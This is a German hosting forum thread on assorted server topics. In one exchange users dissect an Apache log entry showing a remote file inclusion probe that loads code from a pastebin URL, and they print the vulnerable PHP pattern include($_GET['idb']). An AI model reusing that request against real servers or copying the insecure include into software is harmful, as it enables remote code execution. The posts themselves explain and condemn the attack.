Das längste Thema

  • Kann man z.B. bei Letzterem den Built-in CODE Server gefahrlos nutzen?

    Läuft halt mit den Rechten des Webservers. Ich finde die Implementierung... nunja... spannend. Das ein PHP Script da einfach nen Prozess forkt und der da dann rumliegt. Habe das dann "richtig" installiert. Der ganze Stack war mir dann auch für Docker zu fett. Hab das auf einer eigenen VM laufen:


    https://github.com/perryflynn/nextcloud-ansible

  • dann kannst ja mal durch probieren

    die v### hast Du ja, und die verdächtigen Domains sind z.B.

    Der DNS-Eintrag von netcup bleibt ja gesetzt, man kann also auch einfach die fraglichen Domains durchpingen und schauen, wo die eigene IP antwortet. Oder ein einfaches dig. Das ist mal deutlich ungefährlicher als das mit dem Image einspielen und zurücksetzen und schneller sollte es auch sein ;)



    happysrv.de

    megasrv.de

    powersrv.de

    quicksrv.de

    Ich hätte aktuell noch einen supersrv beizusteuern :/

  • Hat wer eine Ahnung wo der Pferdefuß ist,

    ich kann mit Win10 USB-Sticks auswerfen,

    hingegen bei USB-Platten scheitere ich;

    im Eventlog hab ich dann z.B. sowas drin stehen ...

    The application \Device\HarddiskVolume14\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MsMpEng.exe with process id 3168 stopped the removal or ejection for the device USB\VID_174C&PID_5106\0123456789ABCDEF0124.

    Grüße / Greetings

    Walter H.


    RS, VPS, Webhosting - was man halt so braucht;)

  • einfach sagenhaft was manches Ungeziefer 'veranstaltet'


    das da im Log vom Apache

    162.55.55.136 - - [17/Apr/2021:12:51:47 +0200] "GET /larva.php?idb=https://pastebin.com/raw/z4Kgk9AA HTTP/1.1" 301 289 "-" "python-requests/2.25.1"

    PHP
    <?php echo 'XO';echo '_';echo 'sp3ctra'; ?>

    was will uns dieses Skript sagen?:D

    Grüße / Greetings

    Walter H.


    RS, VPS, Webhosting - was man halt so braucht;)

  • mainziman Dass der Angreifer somit ganz einfach prüfen kann, ob X0_sp3ctra in der Ausgabe vorkommt. Erst wenn das der Fall ist, wird der richtige Angriff gestartet. Lohnt sich vorher ja nicht und ruft nur die Security-Experten auf den Plan. Mit diesem nutzlosen Fragment kann man, ohne passenden Honeypot, noch nichts analysieren. Und das ist dem Angreifer nur recht ;)


    Die Lücke selbst ist wohl so was:

    PHP
    // allow_url_fopen   = 1
    // allow_url_include = 1
    include($_GET['idb']);

    (Achtung Kinder: Nicht nachmachen!)

    "Wer nur noch Enten sieht, hat die Kontrolle über seine Server verloren." (Netzentenfund)

  • include($_GET['idb']);

    dafür würd ich die fristlose Entlassung aussprechen;

    man inkludiert keine dynamischen Inhalte,

    include (...) hat ausschließlich hardcoded auf bekannte Files/Objekte zu erfolgen;

    alles andere ist Pfusch;)

    Grüße / Greetings

    Walter H.


    RS, VPS, Webhosting - was man halt so braucht;)

  • Scheint sich aber zu lohnen (für den Angreifer), sonst hättest Du solche Zeilen nicht im Log. :D


    Gibt sicher noch genügend alte Software, die stattdessen readfile() verwenden wollte. Oder eben doch include(), aber mit Validierung der Parameter.

    "Wer nur noch Enten sieht, hat die Kontrolle über seine Server verloren." (Netzentenfund)

  • Aus gegebenem Anlass:


    Externer Inhalt www.youtube.com
    Inhalte von externen Seiten werden ohne Ihre Zustimmung nicht automatisch geladen und angezeigt.
    Durch die Aktivierung der externen Inhalte erklären Sie sich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.


    Hach ja, da kommen Kindheitserinnerungen hoch. ^^

  • Wird eigentlich bei irgend jemandem noch die "Same Day Antwort"-Garantie von Netcup eingehalten?

    Bei meinen (seltenen) Anfragen ist das nicht der Fall; Auch jetzt wieder: Anfrage von gestern morgen: Bisher unbeantwortet.


    Dann sollte man den Passus bzw. die Garantie auch ehrlicherweise streichen und klar kommunizieren, dass man deutlich länger auf eine Antwort warten muss...

    Es hat nur etwas über zwei Tage gedauert, bis heute die Rückmeldung kam, dass es an die zuständigen Kollegen weitergeleitet wurde. Der Support von NetCup ist mittlerweile leider auf einem extrem bescheidenen Niveau. Das war vor einigen Jahren, als Netcup noch nicht so groß war eine ganz andere Nummer. Leider bleibt die Qualität beim Wachstum offensichtlich auf der Strecke...

  • Es hat nur etwas über zwei Tage gedauert, bis heute die Rückmeldung kam, dass es an die zuständigen Kollegen weitergeleitet wurde. Der Support von NetCup ist mittlerweile leider auf einem extrem bescheidenen Niveau. Das war vor einigen Jahren, als Netcup noch nicht so groß war eine ganz andere Nummer. Leider bleibt die Qualität beim Wachstum offensichtlich auf der Strecke...

    Ich sag nur ct: Vorsicht Kunde!

  • Hust, ich hab grad auf einer Mailingliste von BIND folgendes aufgeschnappt ...

    Zitat

    On our servers where we use Bind 9.16, named needs approx. 29G RAM. On the servers with Bind 9.11 named needs approx. 25G RAM.

    heftig was da so ein DNS-Server von NIC.at¹ so an RAM 'verbrät';)


    ¹ das Mail stammte von jemanden der NIC.at;

    Grüße / Greetings

    Walter H.


    RS, VPS, Webhosting - was man halt so braucht;)